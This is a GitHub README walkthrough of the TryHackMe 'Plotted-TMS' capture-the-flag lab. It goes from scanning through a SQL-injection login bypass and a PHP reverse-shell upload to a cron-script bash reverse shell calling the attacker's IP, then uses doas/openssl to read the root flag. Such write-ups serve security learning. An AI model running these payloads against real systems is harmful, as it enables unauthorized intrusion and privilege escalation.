https://github.com/bhattjayd/plotted-tms-ctf
https://github.com/bhattjayd/plotted-tms-ctf
Last synced: 8 months ago
JSON representation
- Host: GitHub
- URL: https://github.com/bhattjayd/plotted-tms-ctf
- Owner: BhattJayD
- Created: 2022-02-20T03:48:46.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2022-02-20T06:10:13.000Z (over 3 years ago)
- Last Synced: 2024-12-30T07:18:29.257Z (9 months ago)
- Size: 410 KB
- Stars: 0
- Watchers: 2
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Plotted-TMS
A beginner-friendly CTF hosted on Tryhackme.com Created by "sa.infinity8888". Gole of this machine is boot to root, get user flag and root flag. and this room contains Enumeration, SQLI, and Privilege escalation
Let us boot up the machine as well as let's get the party started
start with Nmap scan
```
nmap -Pn -A -vvv -sV -sC -oN normal 10.10.255.29
```
which gives us open ports
```
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; pro
tocol 2.0)
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
445/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
let us start with a directory scan with go buster
```
gobuster -u http://10.10.255.29/ -w ~/Tools/SecLists/Discovery/Web-Content/common.txt
```
Which gives us
```
=====================================================
2022/02/20 09:33:06 Starting gobuster
=====================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/admin (Status: 301)
/index.html (Status: 200)
/passwd (Status: 200) /server-status (Status: 403)
/shadow (Status: 200)
===================================================== 2022/02/20 09:35:05 Finished
=====================================================
```
/admin directory contains id_rsa. Which contains base64 value
decode of it is
`Trust me it is not this easy..now get back to enumeration :D`
/passwd and /shadow also contains the same base64 and result is
`not this easy :D`
so not much found in PORT 80 so let us enumerate 445 with Go-Buster
```
gobuster -u http://10.10.255.29:445/ -w ~/Tools/SecLists/Discovery/Web-Content/common.txt
```
Which gives us
```
=====================================================
2022/02/20 09:50:36 Starting gobuster
=====================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/management (Status: 301)
/server-status (Status: 403)
=====================================================
2022/02/20 09:55:18 Finished
=====================================================
```
/management contains login button which redirect to http://10.10.255.29:445/management/admin/login.php
Let us pass username as admin and password as admin in response we got an Incorrect username or password.
so in the user name field, pass username as admin 'or 1=1-- -'
and any random password in the password field and sign in. we got into the portal
forthwith we will be using PHP reverse shell.
from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
on this file we will change IP to our IP and
and start nc listner
`nc -nlvp`
On the admin, portal visit the setting tab and replace a logo with our PHP reverse shell and update file. with that, we will get a reverse shell on our system
```
nc -nlvp 1234
Listening on 0.0.0.0 1234
Connection received on 10.10.255.29 41970
Linux plotted 5.4.0-89-generic #100-Ubuntu SMP Fri Sep 24 14:50:10 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
04:48:07 up 56 min, 0 users, load average: 1.43, 1.24, 1.26
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
```
now then we will Stabilise the shell
```
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@plotted:/$ ^Z
[1]+ Stopped nc -nlvp 1234
splitunknown@SplitUnknown:~/Desktop/Plotted-TMS$ stty raw -echo;fg
splitunknown@SplitUnknown:~/Desktop/Plotted-TMS$ nc -nlvp 1234
www-data@plotted:/$
```
we don't have much access as www-data on the system let's enumerate to get pwned plot_admin for user flag
`cat /etc/crontab`
`* * * * * plot_admin /var/www/scripts/backup.sh`
contains backup script which execute every one minutes.and we have write access to that folder. remove the backup.sh
create backup.sh on our system which contains
```
#!/bin/bash
/bin/sh -i >& /dev/tcp/10.8.244.200/8888 0>&1
```
and start python webserver
`python3 -m http.server`
then wget backup.sh in /var/www/scripts location
`wget http://10.8.244.200:8000/backup.sh`
give execute permission to backup.sh
`chmod +x backup.sh`
start listener on our system
`nc -nlvp 8888`
after 1 minute you should get the shell
stabilise the shellstabilise the shell
```
$ python3 -c "import pty;pty.spawn('/bin/bash')"
plot_admin@plotted:~$ ^Z
[1]+ Stopped nc -nlvp 8888
splitunknown@SplitUnknown:~/Desktop/Plotted-TMS$ stty raw -echo;fg
nc -nlvp 8888
```
greb user flag
`cat ~/user.txt`
let us move on to privilege escalation run this
`find / -type f -perm /4000 -ls 2>/dev/null`
to get suid binarys.
and we found /usr/bin/doas unusual suid.
```
plot_admin@plotted:~$ cat /etc/doas.conf
permit nopass plot_admin as root cmd openssl
```
we can run openssl without password with root access on doas
```
plot_admin@plotted:~$ file=/root/root.txt
plot_admin@plotted:~$ doas openssl enc -in "$file"
Congratulations on completing this room!
Hope you enjoyed the journey!
Do let me know if you have any ideas/suggestions for future rooms.
-sa.infinity8888
plot_admin@plotted:~$
```
I hope this walk-through was helpful. Thank you so much for reading it
Happy Hacking ❤